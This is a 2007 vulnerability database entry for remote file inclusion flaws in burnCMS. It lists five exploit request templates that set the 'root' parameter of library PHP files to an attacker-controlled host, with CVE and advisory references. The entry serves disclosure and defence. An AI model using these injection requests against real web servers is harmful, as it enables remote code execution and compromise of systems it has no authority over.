burnCMS root Multiple Variable Remote File Inclusion

2007-05-05T13:04:34
ID OSVDB:35617
Type osvdb
Reporter OSVDB
Modified 2007-05-05T13:04:34

Description

Manual Testing Notes

Exploit:[target]/lib/authuser.php?root=[attacker]

Exploit:[target]/lib/misc.php?root=[attacker]

Exploit:[target]/lib/connect.php?root=[attacker]

Exploit:[target]/lib/db/mysql.class.php?root=[attacker]

Exploit:[target]/lib/db/postgres.class.php?root=[attacker]

References:

ISS X-Force ID: 33938 Generic Exploit URL: http://www.milw0rm.com/exploits/3809 FrSIRT Advisory: ADV-2007-1557 CVE-2007-2364 Bugtraq ID: 23691